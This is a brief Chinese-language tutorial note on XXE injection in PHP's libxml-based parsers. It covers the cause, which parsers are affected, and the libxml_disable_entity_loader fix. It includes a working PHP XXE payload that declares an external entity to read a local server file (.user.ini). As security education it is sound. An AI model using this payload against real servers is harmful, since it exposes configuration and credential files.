xxe hacking

漏洞成因:

  XML 文件的解析依赖 libxml 库,而 libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理。

影响:

  常见的XML解析方法有:DOMDocument、SimpleXML、XMLReader,这三者都基于libxml库解析XML,所以均受影响,xml_parse函数则基于expact解析器,默认不载入外部DTD,不受影响。


修复:

  php解析xml文件之前使用libxml_disable_entity_loader(true) 来禁止加载外部实体。


攻击代码:

<?php
$xmlstring = <<<EOF
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE ANY [
 <!ENTITY xxe SYSTEM "file:///E:/wwwroot/.user.ini">
]>
<X>&xxe;</X>
EOF;

$xml = simplexml_load_string($xmlstring);

print_r($xml);
?>

wKioL1XxT4uTNIfRAAOndMJjd0U696.jpg


你可能感兴趣的:(xxe攻击原理)